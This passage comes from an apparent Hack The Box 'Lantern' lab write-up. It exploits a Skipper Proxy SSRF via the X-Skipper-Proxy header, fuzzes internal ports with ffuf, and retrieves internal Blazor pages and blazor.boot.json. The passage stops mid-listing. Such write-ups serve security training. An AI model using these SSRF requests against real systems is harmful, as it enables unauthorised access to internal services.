SSRF
The target web application on the port 80, using Skipper Proxy, has been suspected to be vulnerable to CVE-2022-38580. The SSRF vulnerability works by appending the X-Skipper-Proxy header. Through that, it would be possible to scan the internal resource.
┌──(kali㉿kali)-[~/archive/htb/labs/lantern]
└─$ python3 -c "print(*range(1, 65536), sep='\n')" > all_ports.txtI’ll first generate a list of all possible ports from 1 to 65535
┌──(kali㉿kali)-[~/archive/htb/labs/lantern]
└─$ ffuf -c -w /usr/share/wordlists/all_ports.txt -t 200 -u http://lantern.htb/ -H 'X-Skipper-Proxy: http://127.0.0.1:FUZZ' -ic
________________________________________________
:: Method : GET
:: URL : http://lantern.htb/
:: Wordlist : FUZZ: /usr/share/wordlists/all_ports.txt
:: Header : X-Skipper-Proxy: http://127.0.0.1:FUZZ
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 200
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
22 [Status: 500, Size: 22, Words: 3, Lines: 2, Duration: 76ms]
80 [Status: 200, Size: 12049, Words: 4549, Lines: 225, Duration: 121ms]
3000 [Status: 200, Size: 2867, Words: 334, Lines: 58, Duration: 630ms]
5000 [Status: 200, Size: 1669, Words: 389, Lines: 50, Duration: 207ms]
8000 [Status: 200, Size: 12049, Words: 4549, Lines: 225, Duration: 44ms]
:: Progress: [65535/65535] :: Job [1/1] :: 1295 req/sec :: Duration: [0:01:26] :: Errors: 0 ::ffuf discovered a total of 5 open internal ports
Based on the returned size, I can assume that the port 80 and 8000 host the same application while the port 22 being occupied by the SSH server
The ports 3000 and 5000, on the other hand, are interesting
Internal Port 3000
┌──(kali㉿kali)-[~/archive/htb/labs/lantern]
└─$ curl -i http://lantern.htb/ -H 'X-Skipper-Proxy: http://127.0.0.1:3000/'
HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, max-age=0
Content-Type: text/html; charset=utf-8
Date: Mon, 19 Aug 2024 12:10:20 GMT
Server: Skipper Proxy
Transfer-Encoding: chunked
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8" />
<meta name="viewport" content="width=device-width, initial-scale=1.0" />
<base href="/" />
<link rel="stylesheet" href="css/bootstrap/bootstrap.min.css" />
<link href="css/site.css" rel="stylesheet" />
<link href="PreProd.styles.css" rel="stylesheet" />
<link href="https://fonts.gstatic.com" rel="preconnect">
<link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i|Nunito:300,300i,400,400i,600,600i,700,700i|Poppins:300,300i,400,400i,500,500i,600,600i,700,700i" rel="stylesheet">
<!-- Vendor CSS Files -->
<link href="css/bootstrap-icons.css" rel="stylesheet">
<!-- Template Main CSS File -->
<link href="css/style.css" rel="stylesheet">
<!--Blazor:{"sequence":1,"type":"server","prerenderId":"a2b110623a454725998fc41290be9c95","descriptor":"CfDJ8BUo1ePf0MxMocV2v0oTDZHAEHhWlp52jIHUlN0Sg8kWts/cWrnwHFnr3uYxuxoVG3CvnnuEcV7SHuxN3yO1lnRJ9hqCXpZVjQLbHzrXMce2BaBNK4t1ie8sMiDyYQvmWBu7cv4M/mgN0grUzTHYnnsFDvOhwp5ItxeiMxd0gO7BsghBdXXqwWRs4Ka99gpZB6B8oE41AK5EYQkZdsyA7cjBERgAYNTuRnYqOc4LDjmSeBdYcjrmQL6K9ebjLC2CySwGX/yxRxdxNwSjM5XcVe\u002BtDCbkSHMvsc0ybToooBUXvtI7XvsUIAXbJCS8dqbzydnfch/UvxAnCbaJzqeBV07qzhepMGNfbLhT3CSG7jCcm1Pq3sn2bCtAbDuZw1/8ffU94KVSoQ9\u002BEsByEV5lPHI6ZydudwsCtqdB4O1dlTTG"}--><!--Blazor:{"prerenderId":"a2b110623a454725998fc41290be9c95"}-->
</head>
<body>
<!--Blazor:{"sequence":0,"type":"server","descriptor":"CfDJ8BUo1ePf0MxMocV2v0oTDZEffbAExTKRugW0ziZD79sabJKDPlMj41xqLSU8M7IK52/SWXiflXqVHsjfkzHaSjqKv\u002BPWhhp\u002BKTnbSmJjXhdNduWoNLMi81KMrs6uLTzvNYY7HHwa8mnUdkN/I8Q05/MvFIvvKqfUH7c5XLsQUDDFuCoHVnsKOEgjKBivnJGBn5rAOqP\u002BViZxdLOQ1eprrMbQ3IHdSQsgLgdbns0iNMDDbXWH/ksvPfVAX8V\u002BN2THhztoxdg4DWP5QqLXX9kl1AaXSo5vp0CBiWfAKLzU1AsTsSKBUXF9Be07bDX1pdPs974IFQ0mHO2uy1g/f4voLMUwA31M0Lm5ZHRjrdIkZJ4e"}-->
<div id="blazor-error-ui">
An unhandled exception has occurred. See browser dev tools for details.
<a href="" class="reload">Reload</a>
<a class="dismiss">🗙</a>
</div>
<script src="_framework/blazor.server.js"></script>
<script>
window.downloadFileFromStream = async (fileName, contentStreamReference) => {
const arrayBuffer = await contentStreamReference.arrayBuffer();
const blob = new Blob([arrayBuffer]);
const url = URL.createObjectURL(blob);
const anchorElement = document.createElement('a');
anchorElement.href = url;
anchorElement.download = fileName ?? '';
anchorElement.click();
anchorElement.remove();
URL.revokeObjectURL(url);
}
</script>
</body>
</html> The internal port 3000 seems to be hosting the custom Blazor application seen earlier
Internal Port 5000
┌──(kali㉿kali)-[~/archive/htb/labs/lantern]
└─$ curl -i http://lantern.htb/ -H 'X-Skipper-Proxy: http://127.0.0.1:5000/'
HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Length: 1669
Content-Type: text/html
Date: Mon, 19 Aug 2024 12:12:43 GMT
Etag: "1dae2bf21875e05"
Last-Modified: Tue, 30 Jul 2024 20:29:09 GMT
Server: Skipper Proxy
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8" />
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no" />
<title>InternaLantern</title>
<base />
<script type="text/javascript">
(function (l) {
if (l.search[1] === '/') {
var decoded = l.search.slice(1).split('&').map(function (s) {
return s.replace(/~and~/g, '&')
}).join('?');
window.history.replaceState(null, null,
l.pathname.slice(0, -1) + decoded + l.hash
);
}
}(window.location))
</script>
<script>
var path = window.location.pathname.split('/');
var base = document.getElementsByTagName('base')[0];
if (window.location.host.includes('localhost')) {
base.setAttribute('href', '/');
} else if (path.length > 2) {
base.setAttribute('href', '/' + path[1] + '/');
} else if (path[path.length - 1].length != 0) {
window.location.replace(window.location.origin + window.location.pathname + '/' + window.location.search);
}
</script>
<link href="css/bootstrap/bootstrap.min.css" rel="stylesheet" />
<link href="css/app.css" rel="stylesheet" />
</head>
<body>
<div id="app">Loading...</div>
<div id="blazor-error-ui">
An unhandled error has occurred.
<a href="" class="reload">Reload</a>
<a class="dismiss">🗙</a>
</div>
<script src="_framework/blazor.webassembly.js"></script>
</body>
</html>The internal port 5000 is indeed an internal application also built withBlazor
blazor.boot.json
Much like JS-based app’s package.json,the blazor.boot.json file is a configuration file used in Blazor applications to list the resources required for the app’s startup, such as assemblies, dependencies, and other assets. It includes metadata for the Blazor WebAssembly runtime to properly load and initialize the application in the browser.
┌──(kali㉿kali)-[~/archive/htb/labs/lantern]
└─$ curl -i http://lantern.htb/_framework/blazor.boot.json -H 'X-Skipper-Proxy: http://127.0.0.1:5000/'
HTTP/1.1 200 OK
Accept-Ranges: bytes
Blazor-Environment: Production
Cache-Control: no-cache
Content-Length: 20709
Content-Type: application/json
Date: Mon, 19 Aug 2024 12:20:50 GMT
Etag: "1daf1abe08eff65"
Last-Modified: Sun, 18 Aug 2024 20:19:07 GMT
Server: Skipper Proxy
{
"cacheBootResources": true,
"config": [ ],
"debugBuild": true,
"entryAssembly": "InternaLantern",
"icuDataMode": 0,
"linkerEnabled": false,
"resources": {
"assembly": {
"Microsoft.AspNetCore.Authorization.dll": "sha256-hGbT4jDhpi63093bjGt+4XVJ3Z9t1FVbmgNmYYmpiNY=",
"Microsoft.AspNetCore.Components.dll": "sha256-NJ2GmZOAzlolS7ZPvt5guh86ICBupqwCNK0ygg7fkhE=",
"Microsoft.AspNetCore.Components.Forms.dll": "sha256-YEcUfJbV\/+SrxppUEKn5jqOg8WptBrdAGaDG+psN8Yg=",
"Microsoft.AspNetCore.Components.Web.dll": "sha256-aq+IFhf0HZZKVz6P\/GhuaY0UvXsguM0h5hlYrzAfugk=",
"Microsoft.AspNetCore.Components.WebAssembly.dll": "sha256-zARafz0vNUQ9qVFCoQO3oQSP+VMitM2+PZs+2OkxMgE=",
"Microsoft.AspNetCore.Metadata.dll": "sha256-hXAd66KKDdPFPpv7aqk5iax9UhTcBUufrs8eHMuWft8=",
"Microsoft.Data.Sqlite.dll": "sha256-P7LhObgh2GnsYLLiMfziXrBpg9kGBWyCbsYGkwtejF8=",
"Microsoft.EntityFrameworkCore.dll": "sha256-\/0vzNZ5eWblA2X+fR1UnJhUxV8M4YE+hmYHhDjTGLRo=",
"Microsoft.EntityFrameworkCore.Abstractions.dll": "sha256-8WueLfL+Qxf6IHdLNiHRte4+9uKx0fzs0SwZLo+vyE0=",
"Microsoft.EntityFrameworkCore.Relational.dll": "sha256-mZQU3N+UuoJQXtwxG9xddHMJcWK3bjbR8vYUtaD+qhw=",
"Microsoft.EntityFrameworkCore.Sqlite.dll": "sha256-3OAZnYHlX6IWO0525\/6Hb9dldwpLRrDYpJyOgrOfM3g=",
"Microsoft.Extensions.Caching.Abstractions.dll": "sha256-WLcZIKlgct2nj4hpaBvZXfHorQG9DH9B\/FZ2IKePG2I=",
"Microsoft.Extensions.Caching.Memory.dll": "sha256-+\/xwpO8U5NMbRcqzMIKrIuvK9dnm3EX9S2C6diMDLmQ=",
"Microsoft.Extensions.Configuration.dll": "sha256-c8yYhfrOBLEnOBglLTu9peXSbJDwFpuT4UQiXSv28Og=",
"Microsoft.Extensions.Configuration.Abstractions.dll": "sha256-5Otet+KKVUjNkE\/hqcNWmt75H1K2VNuKPFagpRd6Ces=",
"Microsoft.Extensions.Configuration.Binder.dll": "sha256-wNKhG3Ovx8jqxbscz2AALlsTLfI6GL2dyDhe63mSsoM=",
"Microsoft.Extensions.Configuration.FileExtensions.dll": "sha256-n2fRP2\/1tGNzaCF5PU4hgTSlHK886OviBf2YAds3NdE=",
"Microsoft.Extensions.Configuration.Json.dll": "sha256-R28\/ywLWxIcFxKtDIj0IxC+bXi4urX6BHeLL24R+vTQ=",
"Microsoft.Extensions.DependencyInjection.dll": "sha256-KqgYK1NWqMxcNfw2Qah+gUhX2Nm+OZrHjyYDQ3VNCeA=",
"Microsoft.Extensions.DependencyInjection.Abstractions.dll": "sha256-nM2DA1GqKLxoPU+NHO\/Z5yQWH5ctJb+2Tu5b9VxIxeM=",
"Microsoft.Extensions.DependencyModel.dll": "sha256-tkBiVGV6aPhN9weYepMZ2vvS6Ggf0uOE88fuWINRAHg=",
"Microsoft.Extensions.FileProviders.Abstractions.dll": "sha256-7PzvEcQvpK1c8tTX9VPI8AF+XrekqbAytNBQXJjvTvQ=",
"Microsoft.Extensions.FileProviders.Physical.dll": "sha256-sXujvGMZDgBBZ9HqfcEq9XsM0pvwyhPt60NA9qLDzGI=",
"Microsoft.Extensions.FileSystemGlobbing.dll": "sha256-viiXOG0fwhWobT0TQ1ZOJiZBdRvYRlWbDtjz+6d8sQI=",
"Microsoft.Extensions.Logging.dll": "sha256-GDZQCBtVHfrZZ6fL95lGoinLeUWLjQShLbfESwO7mrc=",
"Microsoft.Extensions.Logging.Abstractions.dll": "sha256-1XXJ0VQ8pybOFNvf\/RA+k+pSfNRrsoMW2h9BItvFXVY=",
"Microsoft.Extensions.Options.dll": "sha256-eGESyy9mRu8RcCGajAu4E8nxSmeB5nxiZkFPVaZ5Vl0=",
"Microsoft.Extensions.Primitives.dll": "sha256-jOmoWSfsdQexH\/6QCA56gR1RMEqeix2iDDUBWbpAOQI=",
"Microsoft.JSInterop.dll": "sha256-U4TlhQzx2DEFb2LgmELxAvWalkXk5Dx\/HsVDyQH8ubA=",
"Microsoft.JSInterop.WebAssembly.dll": "sha256-11MM537VpREUoEMIiXr2jsO5eqHCkixj9Zi1I4hLPOw=",
"Radzen.Blazor.dll": "sha256-O3yDs1MlWqWu2hreREiTQAVCo6UPcAhx\/1zwHAbq9AU=",
"SQLitePCLRaw.batteries_v2.dll": "sha256-3zKmFZbXOvqy\/nbxPUg5JZvDTOvq9arYLUdbvEcjJaU=",
"SQLitePCLRaw.core.dll": "sha256-PNJw8RYgf8D34p1OhHDWQniuocI62TExP3HpyqrrhCc=",
"SQLitePCLRaw.provider.e_sqlite3.dll": "sha256-HbBW2\/rK7rujCfVp110bCv\/xKe+LGGRcIbcF73Mq7uM=",
"System.IO.Pipelines.dll": "sha256-fpnawcAWgJ8i0JPJ9DhQ8XFDKYsTi6md2eRFNh\/bONA=",
"System.Linq.Dynamic.Core.dll": "sha256-FdGinC2F9gJYE7tbVl93B0jYWTB+CCpGiFHbABqlHFE=",
"Microsoft.CSharp.dll": "sha256-ql0JuqQqMvWlkrz+ktRnb+sgR+RBuabSpT82YicO+Dc=",
"Microsoft.VisualBasic.Core.dll": "sha256-yjDGnYBu6yp61MAe+i7sbIj\/AgPhLbBm5dleSxMPjDo=",
"Microsoft.VisualBasic.dll": "sha256-m6TH5rs0haOMSWvUpe3f7naMYyalexbVkIbVq1amiUw=",
"Microsoft.Win32.Primitives.dll": "sha256-876FS9JtlcgkjOdpbs3USC8yRAhx1J17Oe06Sxvgv1s=",
"Microsoft.Win32.Registry.dll": "sha256-XobufPKAyEWhlHb3h0C1DBkY0W+tuI2nHHzJSlv6sd4=",
"System.AppContext.dll": "sha256-hBsiGfTO8GaNHCdJ56FXzm0RGbXphFD5i7XcgumQ5eE=",
"System.Buffers.dll": "sha256-cIBVQrX2W2b5N8+mTMqkZWml\/dk2IYx7pMUf0\/Ht5W4=",
"System.Collections.Concurrent.dll": "sha256-siI159VpD2kJEZKPQt190M1ILHAQ8zZmlExN8ABLOpw=",
"System.Collections.Immutable.dll": "sha256-RnZJ2YASocT2oB\/iuNE8vQvy6NfhULpfdVIbtKIHCDI=",
"System.Collections.NonGeneric.dll": "sha256-dK0uprIk58Zq\/0ds9ff4NdXE+eGgwXEPt1+zHdwEDEQ=",
"System.Collections.Specialized.dll": "sha256-PpNg+QA9B70KCxPBqJYreFMpDplPOZEczvjo\/G+vdU4=",
"System.Collections.dll": "sha256-7+zDvydzBWfAOV3bOqXSCD7GqskEAIQ3RzZ0IXiQsAs=",
"System.ComponentModel.Annotations.dll": "sha256-gJZuo7oH44JEm+ABiI\/0SCYvW4btsifc6SQ93rolPtQ=",
"System.ComponentModel.DataAnnotations.dll": "sha256-c9XX2VfWJO2vQwja\/S9IMq4IaEVNIFBSdo1yN00ipTM=",
"System.ComponentModel.EventBasedAsync.dll": "sha256-a6Zv5CE2XCHSH6P5one9x+s9AETxFBsps9r9xjbyytk=",
"System.ComponentModel.Primitives.dll": "sha256-Ldn4aoxvjOLgvQ9Onwicuzrx2fFIu3Rz0Dv2MdNsLtw=",
"System.ComponentModel.TypeConverter.dll": "sha256-Z22usUOyo6Y+llp9jVHm8X+MiU41IkuvJTkuJMNOmx4=",
"System.ComponentModel.dll": "sha256-4mdLIiD68reMpts\/jwSZNSDriaxeKwnQN\/bbRp3ymjc=",
"System.Configuration.dll": "sha256-ndWVZOsXDGoCB+GrsvduXcLDyAcFi+H7G\/MeMcGAmkQ=",
"System.Console.dll": "sha256-sfSjogW2UHhB1\/Nh5SNyZLbc\/Qx1Sd\/t59EZEIiAGsE=",
"System.Core.dll": "sha256-UIvt8dePz7PcAULl7yQlO0Re3Q\/06HNI8nxsH1MNLFk=",
"System.Data.Common.dll": "sha256-QHHyRzOPsWFYvrU4Z2hnJmZmzhgirRscl7n7L3BiTfE=",
"System.Data.DataSetExtensions.dll": "sha256-jBgz7GiFLxY3uae0rmhsnCrhFw3nWh37zS8xK6XXCLw=",
"System.Data.dll": "sha256-uprvV1ostYH0WGtP0peiUMFKZgWyj1F3RsCA0+Pjwno=",
"System.Diagnostics.Contracts.dll": "sha256-04HscpY2KVy3rAYunUTynLbO1QdOrQEy2IWRaxtUD1E=",
"System.Diagnostics.Debug.dll": "sha256-dJ0BRGYTZEKX2lvaiF3DwOs+3NoksKxBc\/\/JkhS3el4=",
"System.Diagnostics.DiagnosticSource.dll": "sha256-6Bda\/qXnVWWS\/+W6zwzK5ahNXI+IXHSat2Y482ykUXY=",
"System.Diagnostics.FileVersionInfo.dll": "sha256-VgF91zwEvvHl9WyGF\/9\/EcW5f5hoV4nXji82rrTgODs=",
"System.Diagnostics.Process.dll": "sha256-LAcV0KCZ+lbQJx5wxbOfg+XHNwtiv0KjE5b2NlXxj4A=",
"System.Diagnostics.StackTrace.dll": "sha256-4aulZf3KsEhHbaCOEWI1MzSQKYXwVCXgXbuKWPARBMI=",
"System.Diagnostics.TextWriterTraceListener.dll": "sha256-hOv0U7h8qObsuPJEx\/m8mLcv99r5\/MdONagOQMG3h3g=",
"System.Diagnostics.Tools.dll": "sha256-yFuBkKVLF5YkUzXiUJdN9Aax1ip9qdKa4g4vHSM7Pg4=",
"System.Diagnostics.TraceSource.dll": "sha256-zSVMA9jpwFQ+HUCn5AgptC59Rqy2QluMrw5iq1Awr+o=",
"System.Diagnostics.Tracing.dll": "sha256-Znt2F2MvUczDKdqHSlxjNU1l9XUqzA+olkHYI\/\/HEZc=",
"System.Drawing.Primitives.dll": "sha256-u6Ds7SMMOdGgX52t00SUjNCXTD1imy8s7QBj2qlIam8=",
"System.Drawing.dll": "sha256-HgN64SBiB8Ajrh25n\/DjpxcW6qQuzrtxZ4Om+nR2dd4=",
"System.Dynamic.Runtime.dll": "sha256-E+Uyxsihob6Ysg2e6tonQQQzKQKAr0M2AINEgeY72Uc=",
"System.Formats.Asn1.dll": "sha256-ttncKNMxBNIMM26nmx0L1TTCxr\/r0rEIldSh7vWwHYw=",
"System.Globalization.Calendars.dll": "sha256-GPVcdDqvBvLxmW0dy4KAChwohexPWXuuSKljnSJyYEI=",
"System.Globalization.Extensions.dll": "sha256-bv7qPH+2WGAyoWOFFn31s26eTEvdwWF9B3JY7Ooueqs=",
"System.Globalization.dll": "sha256-+WfptQvKMZV5hzhEIAfPGh4++aNn+SBTCs\/iI1WR8Dk=",
"System.IO.Compression.Brotli.dll": "sha256-bGxNHKkn7llJau+sGbQ2G3ASBqnpv337+kRmN63ftLI=",
"System.IO.Compression.FileSystem.dll": "sha256-ahuONSqKzbUeueVBOowVQ6tHUijcV3h4LII\/dCWTY+w=",
"System.IO.Compression.ZipFile.dll": "sha256-dRbKoalR17SAvWAkQj7jLreA6QRJ1LIuXd2au5Xekzw=",
"System.IO.Compression.dll": "sha256-wG4o2\/MIZgfUDo1Vet1Gip0SORGlHfGp2Yp6Dxo6Vt0=",
"System.IO.FileSystem.AccessControl.dll": "sha256-eYdrk8dJz\/wUrufjP\/UNggdTFNwk4O3YwbpHTdUDsX8=",
"System.IO.FileSystem.DriveInfo.dll": "sha256-VsDACniP8x714h33W\/zlQSqoMDUEuI2PhdjL0e2iCOc=",
"System.IO.FileSystem.Primitives.dll": "sha256-YR5Y9FjJgCSd2ICb5R+kQ1OULbHknX\/rT5DcuBfEKN0=",
"System.IO.FileSystem.Watcher.dll": "sha256-DofMA10KA6kXgqHGF0T+tkZs23dvaX8tOubRco6EE0c=",
"System.IO.FileSystem.dll": "sha256-AQmejCKaDpWSbijkXOHGKGPx7omcSePn0xhYEa+9\/nU=",
"System.IO.IsolatedStorage.dll": "sha256-KI5UJjVeANP6d5Ya0iiG5ezOqCZDyL5FngTHdOu08SA=",
"System.IO.MemoryMappedFiles.dll": "sha256-bdImZQ\/CjWze5n5Q0qW+HdYxUfg0shaUKvIGaS7M4ts=",
"System.IO.Pipes.AccessControl.dll": "sha256-UPKPCzZwwaiE6bk32YvgCJjF5d3d8ORAGBzFYOAebsY=",
"System.IO.Pipes.dll": "sha256-s4RGtH\/jENkZfbXgVQRYW2M6c+x+lKPS2NQV\/I8F5Vo=",
"System.IO.UnmanagedMemoryStream.dll": "sha256-d9XMexSCGwm51FC26V1ruNMrkcaWMnaRlHZ0RlWpgk4=",
"System.IO.dll": "sha256-tPl5IEqEL9rZ0AA1lNyWr+NpSAsJXq18FGJ+yT59Axw=",
"System.Linq.Expressions.dll": "sha256-JHWBpvo7vIZoyC6nJKrsySWYISCX4rcC1vrooBjOeiw=",
"System.Linq.Parallel.dll": "sha256-pNJ8lVItDNo+fLK\/fk18QB4pRLmqbT0Ynrq3O563b3E=",
"System.Linq.Queryable.dll": "sha256-g1mOwcDyw7rBZgQx5SY0lsX8ZzXxDwTdOD3lbZjXx9g=",
"System.Linq.dll": "sha256-kKiuT3My5hXJTds+8wSpfhnkQ3EuNwAQOxLGXVWoo\/M=",
"System.Memory.dll": "sha256-WkC8Wsmx3jhJzOozIVey19+2WCRKagDXqQ2wPoTmqMQ=",
"System.Net.Http.Json.dll": "sha256-yxJsoo7mpPgba40f9MtcAVBP51xO6MdTAXUl6snT4h4=",
"System.Net.Http.dll": "sha256-r3K4KxolDW28DS3TVL\/TGXhligLQC6Z3HjHkmDmIfas=",
"System.Net.HttpListener.dll": "sha256-v4pad4WjG60vdOD6uLny6O81hhrBVd48y9rDdN8Dq\/o=",
"System.Net.Mail.dll": "sha256-2mwF5+qoPkx3XIiJi2OYUzem+cWt3VF9+KaNf8Hsye0=",
"System.Net.NameResolution.dll": "sha256-M1ZJefldkQZKromnEt+NOuyj\/yZoRNZA4ylC65eHm6g=",
"System.Net.NetworkInformation.dll": "sha256-wsMHsDbz4d5DydbVLVrBTCbD\/9iiZ7nnySLsoe9lZOA=",
"System.Net.Ping.dll": "sha256-OgyabYmjg\/QoikHVhC21oZ+j+l1qh8KY4q3r\/M2NnTI=",
"System.Net.Primitives.dll": "sha256-NG4UfhaU5YjgXEGUyUp4iQz9iZVaq4bDWEKYS25AYag=",
"System.Net.Quic.dll": "sha256-EBUis8AXuMo+\/ClBGBEBRQSBsN2VZVCUW2lK8KgqHDc=",
"System.Net.Requests.dll": "sha256-D28ojQn2wULGH3UY3KCQq\/W2tQOTXdEjf4o5QzrxjpA=",
"System.Net.Security.dll": "sha256-rtOi8JvsuVI2UHUu3K2aTXHfW\/HaUT8hfWmOCHqJfD8=",
"System.Net.ServicePoint.dll": "sha256-xC8LyLf2wKJv9NbYGxIBF0U278DK+R9EC+TiVQB3kEw=",
"System.Net.Sockets.dll": "sha256-KnJrJeKN7C63waH5UwAkTrInYNHGZn9QuVFCbLg4wMk=",
"System.Net.WebClient.dll": "sha256-ujyYKldEAwk4tEavtIDnDLqiqbzF2QjVmAzqx8MsQng=",
"System.Net.WebHeaderCollection.dll": "sha256-vnRspNkJub8sXtoWeZs8+oq+1FsquxH756RKGxjOku8=",
"System.Net.WebProxy.dll": "sha256-bIe3ECnqNiPcRaLQowGHm3WTfeCrHrs9HmTmHrrl9vI=",
"System.Net.WebSockets.Client.dll": "sha256-xkeIwJxbwgJVlEbFDEygTnyJy+fX4zml2\/9\/MSkf8gE=",
"System.Net.WebSockets.dll": "sha256-j7qKM1czN5Vc8ZqXLXPbxo4ddYPM6dXSUTShZb1rtkI=",
"System.Net.dll": "sha256-G8nfef3F7xib4OgZq9SblT3qQIliMyySyx4evJzSqEE=",
"System.Numerics.Vectors.dll": "sha256-hbOCd5D16UtHUaw9nqW8e+4GschlwoU4GEyTgTYt\/Jo=",
"System.Numerics.dll": "sha256-C9vZH9HxWKaSHK6pme42QeTgu37MzEGBSlHeQtzixEA=",
"System.ObjectModel.dll": "sha256-pm3\/qRJNMeOtJciRC71QcNZz+0T3D97YnGyOnasBho4=",
"System.Private.DataContractSerialization.dll": "sha256-QbUE5Dd94wLrv6MhfNewyz+lNv7VIFWVofS7ohYdrXU=",
"System.Private.Runtime.InteropServices.JavaScript.dll": "sha256-\/8PF7xlkMgqCzSnp4roSH8ICGHPrzz4\/1C0DIichYpI=",
"System.Private.Uri.dll": "sha256-X62lyZatIoKTJY\/Rt31LgU\/\/NX88W86O6pfWh6XS41c=",
"System.Private.Xml.Linq.dll": "sha256-UqktLl8RdHKrJ38qqF6XlvPOvi3xgY6ZVEeuOa4u6w8=",
"System.Private.Xml.dll": "sha256-feqoL93GgPoHmad5UF2r0yg4RTbJhYsXQcimiawJv6U=",
"System.Reflection.DispatchProxy.dll": "sha256-zlWNpwEJQEcx7Mf1xOg\/Sd5hIn1YGK+LBeiAhjKYabs=",
"System.Reflection.Emit.ILGeneration.dll": "sha256-Wwzmn9ixLOdT9Q4S3lsGbvU6RgX88PrdJapC2weJQ50=",
"System.Reflection.Emit.Lightweight.dll": "sha256-StIky\/cqvRUJnMZgDJ3S8zDgKeyiOXPBGul1qmY3zQo=",
"System.Reflection.Emit.dll": "sha256-8+wJTovqZaO43nyKvBpajlYed1fklPXupH24vEe1rcE=",
"System.Reflection.Extensions.dll": "sha256-14fnFJC0FAATTHPiVrQwvmLmm2qi8Ni18HvYZNZX0rs=",
"System.Reflection.Metadata.dll": "sha256-ighwuSyDVJI1oYrAoHA3PMc5uEh3LRZQ1D1+nJnzXF4=",
"System.Reflection.Primitives.dll": "sha256-YQBeKPHUbX9vi3HtoUXyks9WPlb2pyV8rtrQK\/6ycCU=",
"System.Reflection.TypeExtensions.dll": "sha256-qvnV8ZTIWtntKKNR7pZ+KwpfPO1EpWD4yh8jTkYKYRo=",
"System.Reflection.dll": "sha256-u7GYvozPApwvzjBc31GuZMeH6vtzPd9PToVE73OANPg=",
"System.Resources.Reader.dll": "sha256-c6FJmtQRb\/VHa2HJ26jk10tgkc4EPI2zAzh3K5asxbU=",
"System.Resources.ResourceManager.dll": "sha256-f4HxrKxMgkTr4MzgdDVq1xRj0nMZ4DX85ZclMulX4vQ=",
"System.Resources.Writer.dll": "sha256-dTHiLV8bUkk1UG8EMyt6DGqR0l2qPUOC9q6q0cyznYY=",
"System.Runtime.CompilerServices.Unsafe.dll": "sha256-k3HWAm8hCD5yrBJ0UPew1ORMmeGyy74ZErf6+X9ETJc=",
"System.Runtime.CompilerServices.VisualC.dll": "sha256-WXOm0n0aBJE1\/2QHYsnQLD0su942NQ7odPc+YNxdab0=",
"System.Runtime.Extensions.dll": "sha256-rzt5RwKG9PduPh47i6I1uq43MXbSEQQ5qC4IanNwgg8=",
"System.Runtime.Handles.dll": "sha256-wJflcv43fAzX3kczlUUcZaLqy6xebfNpO7YWrUdlN6M=",
"System.Runtime.InteropServices.RuntimeInformation.dll": "sha256-TXdeaQuMYwYsZekQZ94n3P\/4WBM9geAoxMU1GMUOFh8=",
"System.Runtime.InteropServices.dll": "sha256-FhSvdPrUwd2cSpIG5LueEynIbkhqsDJfuhUkjTqV7HI=",
"System.Runtime.Intrinsics.dll": "sha256-SbogkH6qeJsWsV7iPIlfWmG+OtFRsWr6PGmtmYel3ss=",
"System.Runtime.Loader.dll": "sha256-04rg75EwwT+qlxSxKNgA\/it8MbVGDr0Xmo30v\/XtW4Q=",
"System.Runtime.Numerics.dll": "sha256-9Lyq9ORGeQFNnJWFUIMzcCVONRm33mMZbcHQ+7kYkqw=",
"System.Runtime.Serialization.Formatters.dll": "sha256-g4\/A5rwaNm8ntiwoA5n2bhpO1XoMBRWDba1wquClO8I=",
"System.Runtime.Serialization.Json.dll": "sha256-WAS9zuFqSGp55zoZVEWUVl+JRk5RN6wVKXkSziM3OOw=",
"System.Runtime.Serialization.Primitives.dll": "sha256-DdvnEF4CSXMqkj0quXgPLlWeBhOEwIK8tEM3Nj132aM=",
"System.Runtime.Serialization.Xml.dll": "sha256-CAGIKrs6UDzetxsW5agYluy6Ku1Ea0UFOeNkswJtqh8=",
"System.Runtime.Serialization.dll": "sha256-OLkN7ThXD3qZPadaVb\/V+Sd6HsIbYXDIEKJVCfOZ5V4=",
"System.Runtime.dll": "sha256-u+p1S6CWZDwJPi5yNoSZRRiispI7HwTKRxrdHErPkE8=",
"System.Security.AccessControl.dll": "sha256-2KdkUTv\/4QPdccH96o1athaPwNRlEFqAG1D1zC55Ywg=",
"System.Security.Claims.dll": "sha256-kgo+HeoL9k2ntqYDslCFA5WhBDMEjo3RKAs04ig\/2iE=",
"System.Security.Cryptography.Algorithms.dll": "sha256-A3pi8LOTmfQIFFXXJc\/V2uOa2EvA2IOpwGDwwf8Xu9A=",
"System.Security.Cryptography.Cng.dll": "sha256-BTtw7nptKY75SZqEGpzteOkSJ1riOa+ynW4t8iELp1c=",
"System.Security.Cryptography.Csp.dll": "sha256-jgxjePXbj7T\/imxqEuM7yxndarlPmO1Mhzx1KSsbE\/o=",
"System.Security.Cryptography.Encoding.dll": "sha256-Yu9rAfznTa+e51IdWkbpGniy\/7zr\/81SlaKE6xeAbAE=",
"System.Security.Cryptography.OpenSsl.dll": "sha256-doNcZf7tQQexD78KDZYAbF3BIpj0zDkvBiKeSInZ\/PI=",
"System.Security.Cryptography.Primitives.dll": "sha256-KuFuBLIlVhgZc9rkRbtJ4byWpfROhUNUjB6nBYab7DY=",
"System.Security.Cryptography.X509Certificates.dll": "sha256-4OwV7OWq8+y1raWVDGXWTHGjq\/Q6LFqFMn5MoMqNCW4=",
"System.Security.Principal.Windows.dll": "sha256-QR3r1ek64aGNBXWL5DLmj0t3NBMBskYDhwGDCrLQ\/o0=",
"System.Security.Principal.dll": "sha256-AvspaIoT5XoryB02FU3R2VE+BbTUzIjY1TQtk+Igx1o=",
"System.Security.SecureString.dll": "sha256-dPPmyPEcJ6\/7BDnE22U04KLqZz9ylEGz3YcVGBoeAhU=",
"System.Security.dll": "sha256-lVo1IzpQ8ApPfXku3TfD+\/WMupxwhj27kxNklLs00uM=",
"System.ServiceModel.Web.dll": "sha256-u6BruHSOCTTwM3mYmrZrI4ZapE+BXNjEhCEhZzncb8Q=",
